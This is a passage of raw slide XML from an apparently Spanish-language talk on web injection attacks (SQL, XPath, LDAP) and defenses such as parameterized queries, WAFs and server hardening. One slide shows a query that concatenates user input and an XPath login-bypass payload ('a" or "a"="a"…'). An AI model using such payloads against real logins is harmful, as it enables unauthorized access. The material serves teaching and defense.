              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>SQLCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>SQLParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>OracleCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>OracleParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>String.Format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>() no vale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Parametrización</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> de Consultas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1"/>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1"/>
              <a:t>ORMs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1"/>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0"/>
              <a:t> o Spring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Parametrización</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> de consultas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>PDO con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>bindParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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¿Qué hago como administrador de Sistemas?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Fortificación del Servidor Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Códigos de error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Restricción de verbos, longitudes, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Filtrado de contenido HTTP en el Firewall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s-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Fortificación de Servidor de Base de Datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Restricción de privilegios de motor/usuario de acceso desde Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Aislamiento de base de datos</a:t>
            </a:r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Introducción</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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9088" y="1497013"/>
            <a:ext cx="714375" cy="9239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9725" y="2903538"/>
            <a:ext cx="742950" cy="1028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6713" y="4406900"/>
            <a:ext cx="733425" cy="914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50182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0988" y="2943225"/>
            <a:ext cx="2284412" cy="935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 bwMode="auto">
          <a:xfrm>
            <a:off x="2706620" y="3191897"/>
            <a:ext cx="1367670" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/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GET/POST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19758865">
            <a:off x="4386414" y="2493516"/>
            <a:ext cx="2324183" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56789"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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SQL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2041783">
            <a:off x="4343427" y="3685826"/>
            <a:ext cx="2466339" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50553"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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XPATH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4490977" y="3066505"/>
            <a:ext cx="2164465" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/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LDAP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50187" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7604125" y="1377950"/>
            <a:ext cx="1096963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1600"/>
              <a:t>SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50188" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7421563" y="2838450"/>
            <a:ext cx="15652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1600"/>
              <a:t>Active Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>One Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>Novell eDirectory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2041783">
            <a:off x="4345352" y="3687751"/>
            <a:ext cx="2466339" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50553"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFB26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           XPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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Injection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pic>
        <p:nvPicPr>
          <p:cNvPr id="50190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91000" y="2833688"/>
            <a:ext cx="844550" cy="10779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WAF (Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Firewall)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Poco conocidos  todavía,  con muchas finalidades distintas y complementarias:, como el bloqueo de ataques,  la inspección de tráfico SSL y HTTP o el filtrado de información.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Funcionamiento como dispositivo de red:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>Out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>-line: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Recibe una copia del trafico de red, lo analiza y emite alertas e incluso puede modificar reglas del cortafuegos para filtrar, por ejemplo, direcciones IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>In-line: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Funciona como proxy inverso, analiza el trafico y puede , puede bloquearlo, generar alertas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> …</a:t>
            </a:r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Existen dos versiones: 1.0 y 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>La 1.0 es una recomendación de la W3C del 16 de noviembre de 1999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Permite realizar búsquedas en ficheros XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Nos podemos referir a cualquier contenido del fichero de una manera rápida</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>arrays</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> con la información extraída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en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>XPath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4767" y="1705963"/>
            <a:ext cx="7027862" cy="4665662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>&lt;charlas&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>	 &lt;!– Esto es un XML muy simple… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>--&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>&lt;charla id=“2”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>	&lt;titulo&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>&lt;/titulo&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>	&lt;ponente&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>Alekusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>&lt;/ponente&gt;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>&lt;/charla&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>&lt;/charlas&gt;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500034" y="1674732"/>
            <a:ext cx="1643074" cy="500066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 redondeado"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2076848" y="2746302"/>
            <a:ext cx="1000132" cy="500066"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha val="1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2357422" y="3286124"/>
            <a:ext cx="3071834" cy="500066"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:alpha val="1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Llamada con línea 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786182" y="1500174"/>
            <a:ext cx="1357322" cy="571504"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout2">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48895"/>
              <a:gd name="adj2" fmla="val -522"/>
              <a:gd name="adj3" fmla="val 79039"/>
              <a:gd name="adj4" fmla="val -44981"/>
              <a:gd name="adj5" fmla="val 79595"/>
              <a:gd name="adj6" fmla="val -120460"/>
            </a:avLst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NODO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="7 Llamada con línea 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715008" y="5214950"/>
            <a:ext cx="2357454" cy="571504"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout2">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6757"/>
              <a:gd name="adj2" fmla="val 48295"/>
              <a:gd name="adj3" fmla="val -245596"/>
              <a:gd name="adj4" fmla="val 27949"/>
              <a:gd name="adj5" fmla="val -265911"/>
              <a:gd name="adj6" fmla="val -13210"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:alpha val="1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CONTENIDO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="8 Llamada con línea 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6715140" y="3286124"/>
            <a:ext cx="2000264" cy="571504"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout2">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6757"/>
              <a:gd name="adj2" fmla="val 48295"/>
              <a:gd name="adj3" fmla="val -50815"/>
              <a:gd name="adj4" fmla="val 48121"/>
              <a:gd name="adj5" fmla="val -52579"/>
              <a:gd name="adj6" fmla="val -181519"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha val="1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ATRIBUTO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896980" y="2285992"/>
            <a:ext cx="6072230" cy="428628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Llamada con línea 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286512" y="1428736"/>
            <a:ext cx="2571768" cy="500066"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 103553"/>
              <a:gd name="adj2" fmla="val 18978"/>
              <a:gd name="adj3" fmla="val 162852"/>
              <a:gd name="adj4" fmla="val 8559"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="1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COMENTARIO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en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>XPath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4 tipos de elementos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Nodo: Puede contener al resto de tipos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: Contiene texto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: Un comentario de XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Preguntando</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>¿Cuál es la charla?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/charlas/charla/titulo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>¿Cuál es el id de la charla?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/charlas/charla/@id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>¿La charla de la que es ponente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Alekusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/charlas/charla[ponente = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Alekusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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0142" y="1600200"/>
            <a:ext cx="2757478" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>&lt;=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>&gt;=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>!=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3214678" y="4709236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/>
              <a:t>Los operadores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" i="1" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" i="1" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t> no pueden ir en mayúsculas.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> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection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Similar al SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> de los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>logins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/usuarios/usuario[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> = “$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>	and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> = “$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Si no filtramos las variables nos pueden generar una consulta cierta para todos los casos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/usuarios/usuario[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “a”=“a” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “a”=“b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>” and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>”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> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection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8443" y="1779313"/>
            <a:ext cx="7027862" cy="4665662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>¿Por qué funciona? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “a”=“a” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “a”=“b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>” and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
